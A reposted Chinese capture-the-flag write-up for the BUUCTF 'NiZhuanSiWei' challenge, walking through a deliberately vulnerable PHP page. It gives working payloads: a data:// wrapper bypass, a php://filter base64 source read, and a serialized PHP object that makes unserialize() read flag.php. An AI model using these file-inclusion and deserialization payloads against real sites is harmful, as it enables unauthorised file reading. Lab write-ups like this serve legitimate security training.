BUUCTF [ZJCTF 2019]NiZhuanSiWei1
涉及知识点:
- php代码审计;
- date://text/plain协议;
- filter 协议;
- 反序列化;
- 魔术方法
打开题目链接,是直接给出的php代码。
-
-
$text = $_GET["text"];
-
$file = $_GET["file"];
-
$password = $_GET["password"];
-
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
-
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
-
if(preg_match("/flag/",$file)){
-
echo "Not now!";
-
exit();
-
}else{
-
include($file); //useless.php
-
$password = unserialize($password);
-
echo $password;
-
}
-
}
-
else{
-
highlight_file(__FILE__);
-
}
-
第一个if语句要求test不为空并且text内容为welcome to the zjctf.
函数file_get_contents()解释:
file_get_contents() 函数把整个文件读入一个字符串中。
和 file() 一样,不同的是 file_get_contents() 把文件读入一个字符串。
file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法.
(ps:具体用法见:PHP file_get_contents() 函数)
于是便想到date://text/plain伪协议,构造payload绕过第一个if:
使用格式:data://text/plain,[code]
eg: data://text/plain,base64,[code]
http://522341e8-4fc1-4d56-822d-01a0962a4569.node4.buuoj.cn:81/?text=data://text/plain,welcome to the zjctf
重新发送后:显示如图所示:
到此,第一个if绕过成功;
在第二个if语句中发现有提示useless .php文件,便想到使用伪协议filter读取文件内容,
php://filter
用法:格式为php://filter/[write] or [read]=[过滤器]/[resource]=[文件路径]
构造第二个payload,读取php文件中的内容:
file=php://filter/read=convert.base64-encode/resource=useless.php
重新发送以后,显示如图所示:
将所得到的内容进行base64解码得到如下php代码:
-
-
-
class Flag{ //flag.php
-
public $file;
-
public function __tostring(){
-
if(isset($this->file)){
-
echo file_get_contents($this->file);
-
echo "<br>";
-
return ("U R SO CLOSE !///COME ON PLZ");
-
}
-
}
-
}
-
分析代码
可知flag应该存在于flag.php文件中;
__toString()是快速获取对象的字符串信息的便捷方式,似乎魔术方法都有一个“自动“的特性,如自动获取,自动打印等,__toString()也不例外,它是在直接输出对象引用时自动调用的方法。
__toString()的作用
当我们调试程序时,需要知道是否得出正确的数据。比如打印一个对象时,看看这个对象都有哪些属性,其值是什么,如果类定义了toString方法,就能在测试时,echo打印对象体,对象就会自动调用它所属类定义的toString方法,格式化输出这个对象所包含的数据。
(ps __toString() 函数详解见:php反序列化及__toString() - 镱鍚 - 博客园)
第二个if语句中有一个反序列化:unserialize()函数:
unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。可写出序列化代码:
(ps:具体用法见:PHP unserialize() 函数 | 菜鸟教程)
-
-
class Flag{
-
public $file = flag.php;
-
}
-
$a = new Flag();
-
echo serialize($a);
-
运行后可得到;
则可再一次进行构造完整payload:
?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
即可显示:
最后在查看网页源代码,即可发现flag。
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhgffbab
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
怎样阻止微信小程序自动打开
PHP中文网 06-13 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01